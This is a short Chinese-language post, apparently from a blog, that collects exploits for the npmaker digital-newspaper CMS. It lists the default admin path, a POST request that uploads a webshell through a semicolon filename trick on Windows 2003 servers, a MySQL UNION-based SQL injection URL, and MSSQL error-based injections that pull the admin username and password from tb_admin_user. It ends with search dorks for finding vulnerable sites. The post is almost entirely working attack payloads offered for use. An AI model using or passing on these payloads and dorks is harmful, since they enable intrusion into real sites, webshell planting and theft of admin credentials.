npmaker数字报漏洞集合

默认后台
/www/index.php?mod=admin&con=index&act=login

2003系统getshell

/www/index.php?mod=admin&con=onepage&act=addpost

post
[php]
onepage%5Bname%5D=phpx&onepage%5Bfilename%5D=php.php;&onepage%5Bcontent%5D=&id=&onepage_submit=%CC%E1%BD%BB
[/php]
shell地址 /shtml/php.php;.shtml

注入漏洞针对mysql数据库的
/www/index.php?mod=admin&con=deliver&act=view&username=809763517&deliId=-32 UNION SELECT 1,user(),3,4,5,6,7,8,9,10,11,12,13--

基本是root

针对mssql数据库的

/www/index.php?mod=index&con=Review&act=getallpaper&papertype=scrb' and user>0--

帐号
a'and (select top 1 tb_admin_user.adminUser from tb_admin_user)>0--

密码
a'and (select top 1 tb_admin_user.adminPwd from tb_admin_user)>0--

关键字
技术支持:喜阅网(www.xplus.com)
inurl:www/index.php?mod=

发表评论